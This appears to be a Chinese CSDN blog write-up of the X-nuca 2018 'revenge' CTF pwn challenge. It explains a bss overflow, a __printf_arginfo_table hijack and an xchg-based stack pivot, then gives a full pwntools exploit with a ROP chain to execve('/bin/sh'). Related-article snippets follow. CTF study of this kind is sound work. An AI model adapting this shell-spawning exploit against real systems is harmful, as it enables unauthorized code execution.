X-nuca_2018_revenge(控制程序流程的新姿势+多字节的xchg指令会清零寄存器高位)

最新推荐文章于 2023-11-21 12:33:50 发布
最新推荐文章于 2023-11-21 12:33:50 发布
阅读量645 收藏 1
点赞数
分类专栏: pwn 二进制漏洞 CTF 文章标签: 安全 PWN CTF 二进制漏洞 缓冲区溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seaaseesa/article/details/107597923
版权
pwn 同时被 3 个专栏收录
161 篇文章 24 订阅
订阅专栏
二进制漏洞
161 篇文章 9 订阅
订阅专栏
CTF
161 篇文章 9 订阅
订阅专栏

X-nuca_2018_revenge(多字节的xchg指令会清零寄存器高位)

首先,检查一下程序的保护机制

然后,我们用IDA分析一下,bss上存在无限溢出

由于该程序是静态编译,我们可以覆盖到下方某些函数指针,我们可以将__printf_arginfo_table虚表指针覆盖,指向我们可控的地方。

这样printf调用时,就调用相应的函数,但是rdi、rsi、rsp这些不可控

这时有一个巧妙的方法,我们让程序执行到

000000000046B9A8 mov     rbx, cs:_dl_scope_free_list此处

正好这里用到的两个变量,我们也能够溢出覆盖到,我们看到,rax我们也可控,因此,我们只需再找一个gadget,xchg eax,esp,然后将_dl_wait_lookup_done设置为该gadget的地址,即可完成栈迁移,其中xchg会清空esp的高4字节,经过试验,发现除了单字节的xchg外,像双字节、四字节的xchg,都会清空高位。

#coding:utf8
from pwn import *

sh = process('./X-nuca_2018_revenge')

#sh = remote('node3.buuoj.cn',26563)
#xchg eax, esp ; ret
xchg_eax_esp = 0x00000000004a1a79
bss = 0x00000000006B73E0
'''
.text:000000000046B9A8                 mov     rbx, cs:_dl_scope_free_list
.text:000000000046B9AF                 test    rbx, rbx
.text:000000000046B9B2                 jz      short loc_46B9F8
.text:000000000046B9B4                 mov     rax, [rbx]
.text:000000000046B9B7                 cmp     rax, 31h
.text:000000000046B9BB                 jbe     short loc_46BA30
.text:000000000046B9BD                 call    cs:_dl_wait_lookup_done
.......................
......................
.text:000000000046B99B                 add     rsp, 8
.text:000000000046B99F                 mov     eax, ebx
.text:000000000046B9A1                 pop     rbx
.text:000000000046B9A2                 pop     rbp
.text:000000000046B9A3                 retn
'''
_dl_scope_free_xx = 0x000000000046B9A8
pop_rdi = 0x0000000000400525
pop_rsi = 0x00000000004059d6
pop_rdx = 0x0000000000435435
pop_rax = 0x000000000043364c
syscall = 0x0000000000400368

payload = p64(bss + 0x10)
payload += '/bin/sh\x00'
#rop
payload += p64(pop_rdi) + p64(bss + 0x8) + p64(pop_rsi) + p64(0) + p64(pop_rdx) + p64(0) + p64(pop_rax) + p64(0x3B) + p64(syscall)
payload = payload.ljust(0x398,'a') + p64(_dl_scope_free_xx)
payload = payload.ljust(0x4E0,'a')
payload += p64(xchg_eax_esp) #_dl_wait_lookup_done
payload = payload.ljust(0x530,'a')
payload += p64(bss) #_dl_scope_free_list
payload = payload.ljust(0x650,'a')
payload += '\x00'*0x78
payload += p64(bss) #__printf_arginfo_table
sh.sendline(payload)

sh.interactive()

 

ha1vk
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
linux 系统下如何配置多线程 pthread库,基于codeblock IDE
sainttelant的博客
07-17 1389
由于近期要解决多线程访问同一内存,造成不当竞争的问题,在codeblock上面要实现一个简单的测试程序,使用常见教程为例: #include <iostream> #include<pthread.h> #include<stdio.h> #include<stdlib.h> #include<string.h> #include<unistd.h> using namespace std; int ticket_sum=20;
汇编语言 XCHG指令
弹炒饭的博客
12-20 2万+
XCHG指令(交换数据)是用于交换两个数据的内容的一个指令,它其实就是mov指令的简化版,所以他的操作数格式于mov 如出一辙,他的操作数有3种格式: 1.XCHG reg,reg (寄存器寄存器) 2.XCHG reg,mem(寄存器,内存操作数 即用户定义的变量) 3.XCHG mem,reg 除了XCHG指令不能使用立即数做操作数外,XCHG指令与mov的指令要求完全相同。在数组排序应用中,XCHG指令提供了一种方法来交换两个数组元素。下面是几个使用XCHG指令的例子 xhcg ax,b
BUUCTF:【x_nuca_2018_offbyone2】(off by null)
weixin_51055545的博客
01-06 1249
在buu里挑了一道heap的题,是一道off by null 的题,比较容易,经典一些 例行检查:
x_nuca_2018_offbyone2(off by null,unlink造成doublefree)
m0_51251108的博客
11-19 3193
x_nuca_2018_offbyone2: 在第七页挑了个题目做,好像不是很难 检查一下,got表可写 漏洞分析: 有个off by null 这题还有输出函数,挺好做的 利用思路: 1.利用off by null 造成unlink使指针数组中,由两个指针指向同一块地方 造成doublefree,我们再顺便泄露了libc 2.劫持free_hook为system,释放填有binsh的那个chunk就getshell了 exp: from pwn import * #from LibcSearcher i
house of husk
最新发布
qq_61670993的博客
11-21 110
house of husk
2018X-NUCA的unconditional_security题
03-22
2018X-NUCA比赛的密码题,unconditional_security题目的源码
2016合天全国高校网安联赛专题赛--赛前指导练习题web进阶篇
07-26
2016合天全国高校网安联赛7月赛前指导练习题web进阶篇
De La Nuca FM-crx插件
04-06
语言:español (Latinoamérica) 官方延伸的颈背圈 - 107.1mhz。 来自delanucafm网站的消息传递客户端 - 107.1MHz。 与来自世界各地的人聊天,同时聆听www.delanucafmm.com的最佳音乐
来自La Nuca FM「De La Nuca FM」-crx插件
03-14
De La Nuca FM收音机的正式延伸 - 107.1MHz。 网络客户端DeLaNucaFM-107.1MHz。 蒙多拉州埃斯库恰斯大米西卡大区托多埃尔蒙多城堡酒店www.delanucafm.com 支持语言:español (Latinoamérica)
基于NUCA结构的同构单芯片多处理器.pdf
07-26
基于NUCA结构的同构单芯片多处理器.pdf
X-nuca_2018_offbyone2
doudoudedi
02-11 473
思路 off by null构造堆重叠然这里的堆块个数充足直接打2次第一次leak libc基址 再次布置好堆块然后打free_hook拿到shell exp: from pwn import * #p=process('./X-nuca_2018_offbyone2') p=remote('node3.buuoj.cn',28262) elf=ELF('./X-nuca_2018_offbyo...
[BUUCTF]PWN——mrctf2020_shellcode_revenge(可见字符shellcode)
mcmuyanga的博客
03-15 3704
mrctf2020_shellcode_revenge 例行检查,64位程序,开启了RELRO和PIE 本地运行看一下大概的情况 64位ida载入,没法f5,直接看汇编 jg大于则跳转,jl小于则跳转,jump无条件跳转 要让程序继续执行下去,肯定是跳转loc_11AC loc_123A loc_11B8 cdqe使用eax的最高位拓展rax高32位的所有位 movzx则是按无符号数传送+扩展(16-32) EAX是32位的寄存器,而AX是EAX的低16位,AH是ax的高8位,而AL是ax的低
2022强网拟态pwn-webheap_revenge
z1r0的博客
11-21 206
这里的n就是src里面的长度,没有限制大小,所以memcpy到dest中的时候就发生堆溢出。笔者用的2.31的libc,这题不能直接用one_gadget了,需要打成system。通过堆溢打fd为hook,打hook为system即可。这个和上个题差不多,uaf变成了堆溢出。
linux下几种目标文件的分析
weixin_30338461的博客
12-21 698
本文中用到的命令: gcc -c addvec.c 生成可重定位目标文件addvec.o readelf addvec.o -a 读取可重定位目标文件addvec.o gcc -O2 -c main.c 生成可重定位目标文件main.o gcc -static -o vecadd addvec.o main.o 链接目标文件addvec.o,生成可执行文件...
Linux nm 命令使用及含义笔记
chqj_163的专栏
05-15 903
很多时候我们并不首要关注库本身的实现,或者根本无法看到其底层逻辑,但又必须确认某些函数或变量的命名(如排查定义冲突)问题,这时候就需要用到一个很基础但是很有用的工具“nm”了。 1 nm 命令介绍 NAME nm - list symbols from object files SYNOPSIS nm [-A|-o|--print-file-name] [-...
花式栈溢出
m0_49959202的博客
10-04 692
文章目录花式栈溢出1.原理1.1 stack pivoting1.2 栈迁移(frame faking)1.2.1 gadget介绍1.2.2 栈(payload)布置1.2.3 步骤分析stage 1:stage 2:stage 3:stage 4:stage 5:stage 6:其他栈迁移方式:1.3 Stack smash1.4 partial overwrite2.例题2.1 stack pivoting2.1.1 习题信息2.1.2 程序分析2.2 栈迁移(frame faking)2.2.1 习
2018X-NUCA------auth2
weixin_40709439的博客
11-26 384
title:2018X-NUCA 第一道web题就让人爆炸,瞬间怀疑人生 题目地址:http://106.75.66.211:8000/main/login?next=/main/index 是绕过stata的auth2.0,第三方授权绑定目标用户的漏洞。 个人理解: 攻击者在登陆网站前,进行第三方的授权登陆,一般使用qq,微博进行第三方授权。具体利用: 点金第三方授权按钮,进入授权页面,此过程需...
汇编指令 MOV MOVZX MOVSX XCHG LAHF SAHF
qq_31155883的博客
04-25 1513
操作数类型 立即数 寄存器操作数 内存操作数 操作数 说明 reg8 AH, AL, BH, BL, CH, CL, DH,DL reg16 AX, BX, CX, DX, SI, DI, SP, BP reg32 EAX, EBX, ECX, EDX, ESI, EDI, ESP, EBP reg 通用寄存器 sreg CS, DS, SS, ES, FS, ...
xchg汇编指令说明
热门推荐
ruins44的博客
04-02 2万+
交换指令XCHG是两个寄存器寄存器和内存变量之间内容的交换指令,两个操作数的数据类型要相同,可以是一个字节,也可以四一个字,也可以是双字。 其指令格式如下: XCHG Reg/Mem,Men/Reg,Reg/Reg 例子: XCHG CH,AL寄存器之间相互交换,字节操作 XCHG BX,SI寄存器之间相互交换,字操作 XCHG [SI],CX 寄存器寄存器之间交换,字操作 该指
3D芯片多处理器内存架构:缓解内存墙问题的关键
"3D芯片多处理器的内存架构概述" 3D芯片多处理器(3D CMPs)是一种结合了三维集成技术与多核处理器并行性的型计算平台,近年来在超大规模集成电路(VLSI)和多核心计算机架构领域备受关注。这种技术的关键在于其...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值